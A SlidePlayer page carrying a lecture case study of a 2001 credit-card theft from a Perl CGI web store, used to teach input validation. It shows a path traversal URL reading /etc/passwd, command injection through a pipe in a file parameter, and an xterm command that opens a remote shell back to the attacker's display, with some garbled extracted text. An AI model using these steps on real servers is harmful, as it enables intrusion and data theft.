Hacking Case Study Sungchul Hong. Acme Art, Inc. Case October 31, 2001 www.acme-art.com A hacker stole credit card numbers from the online store’s database.

Slides:



Advertisements
Similar presentations
Adding Dynamic Content to your Web Site
Advertisements

Csci5931 Web Security1 Case Study: A Forensic Lesson for Web Security (MSS, part one)
WebGoat & WebScarab “What is computer security for $1000 Alex?”
FILE TRANSFER PROTOCOL Short for File Transfer Protocol, the protocol for exchanging files over the Internet. FTP works in the same way as HTTP for transferring.
COEN 445 Communication Networks and Protocols Lab 4
Introducing the Command Line CMSC 121 Introduction to UNIX Much of the material in these slides was taken from Dan Hood’s CMSC 121 Lecture Notes.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
Creating WordPress Websites. Creating a site on your computer Local server Local WordPress installation Setting Up Dreamweaver.
Chapter Apache Installation in Linux- Mandrake. Acknowledgment The following information has been obtained directly from
CP476 Internet Computing Browser and Web Server 1 Web Browsers A client software program that allows you to access and view Web pages on the Internet –Examples.
Basic Unix Dr Tim Cutts Team Leader Systems Support Group Infrastructure Management Team.
CGI Programming: Part 1. What is CGI? CGI = Common Gateway Interface Provides a standardized way for web browsers to: –Call programs on a server. –Pass.
Creating Web Page Forms
Chapter 6: Hostile Code Guide to Computer Network Security.
Presenter Deddie Tjahjono.  Introduction  Website Application Layer  Why Web Application Security  Web Apps Security Scanner  About  Feature  How.
2 $ command Command Line Options ls –a –l hello hi Command Arguments.
1 Web Developer & Design Foundations with XHTML Chapter 6 Key Concepts.
CGI Common Gateway Interface. CGI is the scheme to interface other programs to the Web Server.
FALL 2005CSI 4118 – UNIVERSITY OF OTTAWA1 Part 4 Web technologies: HTTP, CGI, PHP,Java applets)
Chapter 9 Part II Linux Command Line Access to Linux Authenticated login using a Linux account is required to access a Linux system. The Linux prompt will.
1 Web Server Concepts Dr. Awad Khalil Computer Science Department AUC.
Demystifying Backdoor Shells and IRC Bots: The Risk … By : Jonathan.
Copyright© 2003 Avaya Inc. All rights reserved Upgrade to Communication Manager 2.0 with Migration to Linux 8.0 Purpose: This presentation was prepared.
Internet / Intranet Fall 2000 Class 7. Brandeis University Internet/Intranet Spring Class 7 Agenda Project / Homework Discussion Forms Validating.
Internet / Intranet CIS-536 Class 7. 2 HTML Forms A Method to Allow Users to Pass Information to a CGI Script Forms Allow Information to Be Entered Via:
CIS 451: Servers, CGI and Log Files Dr. Ralph D. Westfall January, 2009.
Lesson 15 Client Side Vulnerabilities and you. Active Server Pages MS’s answer to the scripting world of PERL and CGI on Unix Usually Written In Visual.
Agenda User Profile File (.profile) –Keyword Shell Variables Linux (Unix) filters –Purpose –Commands: grep, sort, awk cut, tr, wc, spell.
Unix Basics Chapter 4.
Python CGI programming
Introduction to Programming the WWW I CMSC Summer 2004 Lecture 6.
 2001 Prentice Hall, Inc. All rights reserved. 1 Chapter 21 - Web Servers (IIS, PWS and Apache) Outline 21.1 Introduction 21.2 HTTP Request Types 21.3.
CGI Security COEN 351. CGI Security Security holes are exploited by user input. We need to check user input against Buffer overflows etc. that cause a.
Web Application Security ECE ECE Internetwork Security What is a Web Application? An application generally comprised of a collection of scripts.
Top Five Web Application Vulnerabilities Vebjørn Moen Selmersenteret/NoWires.org Norsk Kryptoseminar Trondheim
Web Pages with Features. Features on Web Pages Interactive Pages –Shows current date, get server’s IP, interactive quizzes Processing Forms –Serach a.
UNIX Commands. Why UNIX Commands Are Noninteractive Command may take input from the output of another command (filters). May be scheduled to run at specific.
Chapter 8 Collecting Data with Forms. Chapter 8 Lessons Introduction 1.Plan and create a form 2.Edit and format a form 3.Work with form objects 4.Test.
ColdFusion Security Michael Smith President TeraTech, Inc ColdFusion, Database & VB custom development
Architecture of the web Client Server retrieved or generated web page.
1 © Copyright 2000 Ethel Schuster The Web… in 15 minutes Ethel Schuster
CGI Common Gateway Interface. CGI is the scheme to interface other programs to the Web Server.
Lesson 2-Touring Essential Programs. Overview Development of UNIX and Linux. Commands to execute utilities. Communicating instructions to the shell. Navigating.
October 3, 2008IMI Security Symposium Application Security through a Hacker’s Eyes James Walden Northern Kentucky University
SQL INJECTIONS Presented By: Eloy Viteri. What is SQL Injection An SQL injection attack is executed when a web page allows users to enter text into a.
SIR and the WEB By Dave Doulton University of Southampton.
The HTTP is a standard that all Web browsers and Web servers must speak in order for the Web portion of the Internet to work.
Web Pages with Features. Features on Web Pages Interactive Pages –Shows current date, get server’s IP, interactive quizzes Processing Forms –Serach a.
Implementing and Using the SIRWEB Interface Setup of the CGI script and web procfile Connecting to your database using HTML Retrieving data using the CGI.
Lesson 3-Touring Utilities and System Features. Overview Employing fundamental utilities. Linux terminal sessions. Managing input and output. Using special.
PHP Error Handling & Reporting. Error Handling Never allow a default error message or error number returned by the mysql_error() and mysql_errno() functions.
27.1 Chapter 27 WWW and HTTP Copyright © The McGraw-Hill Companies, Inc. Permission required for reproduction or display.
Form Processing Week Four. Form Processing Concepts The principal tool used to process Web forms stored on UNIX servers is a CGI (Common Gateway Interface)
Unit 1 – Web Concepts Instructor: Brent Presley.
Web Programming Overview. Introduction HTML is limited - it cannot manipulate data How Web pages are extended (include): –Java: an object-oriented programming.
Web Server Apache PHP HTTP Request User types URL into browser Address resolved if nec. We use directly Most browsers request.
Session 11: Cookies, Sessions ans Security iNET Academy Open Source Web Development.
Getting Started with Unix Naomi Altman. Connecting to a PSU Linux Cluster click on SSH click on "quick connect" Host Name: lxcluster.tlt.psu.edu User.
ASP.NET WEB Applications. ASP.NET  Web application framework developed by Microsoft  Build dynamic data driven web applications and web services  Subset.
Lesson 11. CGI CGI is the interface between a Web page or browser and a Web server that is running a certain program/script. The CGI (Common Gateway Interface)
University of Kansas Department of Electrical Engineering and Computer Science Dr. Susan Gauch April 21, 2005 I T T C Introduction to Web Technologies.
SlideSet #20: Input Validation and Cross-site Scripting Attacks (XSS) SY306 Web and Databases for Cyber Operations.
Internet/Web Databases
Introduction to Programming the WWW I
Chapter 27 WWW and HTTP.
Defense in Depth Web Server Custom HTTP Handler Input Validation
PHP and Forms.
Architecture of the web
SHELLSHOCK ATTACK.
XAMPP.
Presentation transcript:

Hacking Case Study Sungchul Hong

Acme Art, Inc. Case October 31, A hacker stole credit card numbers from the online store’s database. Firewall was installed Only port 80 and 443 were open Computer forensics teams found following;

Server Environment Apache on Linux system Perl CGI script was used

Hacker is looking around web pages and clicking images

Hacker's Move art.com/index.cgi?page=index.cgi [31/Oct/2001:03:03: ] “GET /cgi-bin/ HTTP/1.0” Hacker sees that index.cgi accepts a filename as a parameter and displays the contents of that filename. He uses index.cgi itself as a parameter to display its own source code

Vulnerability Revealed *** No parameter type checking *** Index.cgi page is revealed

Vulnerability The hacker guesses the system file name and its path. Then open it.

Error Message Reveals the programming secrete.

Hacker’s Next Move art.com/index.cgi?page=/../../../../../../../../../etc/passwd (write the passwd file into the screen)

Message The entire contents of the /etc/passwd file are returned and displayed in the browser. Rootx0:0:root/root/bin/bash bin:x:1:1:bin/bin: daemonx:2:2:daemon:/sbin:admx3:4:adm:/var/ad m: lp:x4:7:lp:/var/spool/lpd: syncx:5:0:sync:/sbin/bin/sync/shutdown:x:6:0shut down:/sbin:shutdown halt:x:7:halt:/sbin/ …

Next Move The hacker uses the pipe character in the file parameter, followed by commands of his choice. Now instead of a file being opened, Perl opens a file handle, which receives the standard output generated by the commands specified in the file name parameter

Code ls –la / *reveals files in the root directory id /* get the process id for index.cgi which xterm /*path for xterminal (use hex ‘0A’ for line feed) Now hackers can run any commands on the Web server under the security privileges of the “nobody” account.

Use xterm to gain interactive shell access to the Web server. Xterm –display :210.0& (The xterm command launches an xterm window back to the attacker’s display on :0.0)

Hacker’s View Bash$ id Uid=99(nobody) gid=99(nobody) group=99(nobody) Bash$ pwd /usr/local/apache/htdocs Bash$

Note The attacker used port 80 (http port) Use only HTTP Firewall couldn’t help it. Lesson: –All the inputs must be checked. –Do not show unnecessary information.

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.